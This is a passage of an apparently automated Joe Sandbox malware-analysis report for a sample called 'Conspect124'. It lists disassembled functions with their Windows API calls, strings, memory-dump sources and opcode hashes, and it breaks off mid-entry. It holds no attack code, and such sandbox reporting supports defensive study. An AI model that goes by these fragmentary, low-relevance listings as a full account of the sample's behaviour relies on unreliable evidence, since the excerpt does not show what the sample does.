                                      • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                      Function 0040626E Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(004281A0,00000400), ref: 004063AF
                                      • GetWindowsDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063C2
                                      • SHGetSpecialFolderLocation.SHELL32(004052E7,?,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063FE
                                      • SHGetPathFromIDListW.SHELL32(?,004281A0), ref: 0040640C
                                      • CoTaskMemFree.OLE32(?), ref: 00406417
                                      • lstrcatW.KERNEL32(004281A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                      • lstrlenW.KERNEL32(004281A0,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 00406495
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040637F
                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406437
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 717251189-730719616
                                      • Opcode ID: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                      • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                      • Opcode Fuzzy Hash: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                      • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                      Function 23BC59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 23BC59EA
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC59F6
                                      • _free.LIBCMT ref: 23BC5A01
                                      • _free.LIBCMT ref: 23BC5A0C
                                      • _free.LIBCMT ref: 23BC5A17
                                      • _free.LIBCMT ref: 23BC5A22
                                      • _free.LIBCMT ref: 23BC5A2D
                                      • _free.LIBCMT ref: 23BC5A38
                                      • _free.LIBCMT ref: 23BC5A43
                                      • _free.LIBCMT ref: 23BC5A51
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 4009ba82e59241df63a29089109a0f2fa02bc5fbb651ec65722f58b991a1b519
                                      • Instruction ID: 05e88edfec09a62c0b5f9466c9d896e40563ed8377c563d1469f7a851dbd6353
                                      • Opcode Fuzzy Hash: 4009ba82e59241df63a29089109a0f2fa02bc5fbb651ec65722f58b991a1b519
                                      • Instruction Fuzzy Hash: 9711747A520288EFCB31DF96C841CDE3FA5EF18250B5545E6BA088B225DA31DA909B80
                                      Function 23BCAA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: a16d57258cdc5fdcaf5c95ccefda7138db4029939f961b5e7924b5351c64c53d
                                      • Instruction ID: f450dc2fb7eeb44dda150da0e825b65955ceb1624ad4372296e4185c7d91ecce
                                      • Opcode Fuzzy Hash: a16d57258cdc5fdcaf5c95ccefda7138db4029939f961b5e7924b5351c64c53d
                                      • Instruction Fuzzy Hash: 12516171A0058ECFDB20EFA8DA845DDBFB5FF4A210F144AE5E581A7664C7358E24CB18
                                      Function 23BC1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D1B
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23BC1D37
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D4B
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D58
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D72
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D7D
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D8A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 1454806937-0
                                      • Opcode ID: 7d9b96788db868f0b0d2ab15c96888478b7e7b0a3ed5e6bffb90788c8ad7e1a1
                                      • Instruction ID: 629be125336d95a757693e3268736ecd53b93a0525340d7083d74e876e9f12a6
                                      • Opcode Fuzzy Hash: 7d9b96788db868f0b0d2ab15c96888478b7e7b0a3ed5e6bffb90788c8ad7e1a1
                                      • Instruction Fuzzy Hash: 0D213DB590125CAFDB31EFA48D9CEEA76ACEF2C245F040DAAF511E3140D6749E468A70
                                      Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                      • GetSysColor.USER32(00000000), ref: 00404281
                                      • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                      • SetBkMode.GDI32(?,?), ref: 00404299
                                      • GetSysColor.USER32(?), ref: 004042AC
                                      • SetBkColor.GDI32(?,?), ref: 004042BC
                                      • DeleteObject.GDI32(?), ref: 004042D6
                                      • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                      Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                        • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E35
                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                      • String ID: 9
                                      • API String ID: 163830602-2366072709
                                      • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                      • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                      Function 23BC9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23BC9C07,?,00000000,?,00000000,00000000), ref: 23BC94D4
                                      • __fassign.LIBCMT ref: 23BC954F
                                      • __fassign.LIBCMT ref: 23BC956A
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 23BC9590
                                      • WriteFile.KERNEL32(?,?,00000000,23BC9C07,00000000,?,?,?,?,?,?,?,?,?,23BC9C07,?), ref: 23BC95AF
                                      • WriteFile.KERNEL32(?,?,?,23BC9C07,00000000,?,?,?,?,?,?,?,?,?,23BC9C07,?), ref: 23BC95E8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 92d36dd3de60024856d6a8859ebb1327a382a6e62018bfc746550a51e241df73
                                      • Instruction ID: 4bf0afa44c7b8f85cfdd9fb9c6a5d25950537fb81eaa0cc9a43d821bf7ec38df
                                      • Opcode Fuzzy Hash: 92d36dd3de60024856d6a8859ebb1327a382a6e62018bfc746550a51e241df73
                                      • Instruction Fuzzy Hash: 3B51A271E00289AFDB20CFA8C895BDEBBF8FF1D300F14496AE955E7291D6709941CB60
                                      Function 23BC3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 23BC339B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 23BC33A3
                                      • _ValidateLocalCookies.LIBCMT ref: 23BC3431
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 23BC345C
                                      • _ValidateLocalCookies.LIBCMT ref: 23BC34B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: a7addf6e4945e00755ce0c900321a83a054b17c355041da19cf069e095bf48e7
                                      • Instruction ID: ced2ffde00a418ea7882c48ad46c185a2ac623ac3d027cd48923a2457c9fdbcb
                                      • Opcode Fuzzy Hash: a7addf6e4945e00755ce0c900321a83a054b17c355041da19cf069e095bf48e7
                                      • Instruction Fuzzy Hash: C741DB34A002889FCB31DF68C844ADEBBB5EF85224F9485F5D91C9B261D739DA01CF95
                                      Function 004052B0 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                      • lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                      • lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                      • SetWindowTextW.USER32(004226C8,004226C8), ref: 0040531D
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      • Opcode ID: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                      • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                      • Opcode Fuzzy Hash: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                      • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                      Function 23BC925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 23BC9221: _free.LIBCMT ref: 23BC924A
                                      • _free.LIBCMT ref: 23BC92AB
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC92B6
                                      • _free.LIBCMT ref: 23BC92C1
                                      • _free.LIBCMT ref: 23BC9315
                                      • _free.LIBCMT ref: 23BC9320
                                      • _free.LIBCMT ref: 23BC932B
                                      • _free.LIBCMT ref: 23BC9336
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction ID: 6717d52c4715be4f8ab6b1d7a0af380ffa2959a6d10e502681ad331b03eb181d
                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction Fuzzy Hash: 4A117F31940B88EEE670EFB0DC45FCB7BADAF1C711F400C76A6DD7A092DA24B6448651
                                      Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                      • GetMessagePos.USER32 ref: 00404B9D
                                      • ScreenToClient.USER32(?,?), ref: 00404BB7
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                      Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402E20
                                      • wsprintfW.USER32 ref: 00402E30
                                      • SetWindowTextW.USER32(?,?), ref: 00402E40
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402E2A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                      • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                      Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                      • wsprintfW.USER32 ref: 00406608
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                      Function 23BC8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23BC6FFD,00000000,?,?,?,23BC8A72,?,?,00000100), ref: 23BC887B
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,23BC8A72,?,?,00000100,5EFC4D8B,?,?), ref: 23BC8901
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 23BC89FB
                                      • __freea.LIBCMT ref: 23BC8A08
                                        • Part of subcall function 23BC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23BC5702
                                      • __freea.LIBCMT ref: 23BC8A11
                                      • __freea.LIBCMT ref: 23BC8A36
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: e295ed74d4ea6ea3eb2561eb7fb4070bbbc39fea87d63a6bd5fe70aa3a7d70ef
                                      • Instruction ID: 4283d725b19b1d93fefd1a006891b8bdc8ee984a805015a34f1bfd3bb17ca441
                                      • Opcode Fuzzy Hash: e295ed74d4ea6ea3eb2561eb7fb4070bbbc39fea87d63a6bd5fe70aa3a7d70ef
                                      • Instruction Fuzzy Hash: 6F510072610286AFEF35DE64CC80EAB77AAEF54650F140AB9FD05D6190EB34DC50C6A0
                                      Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
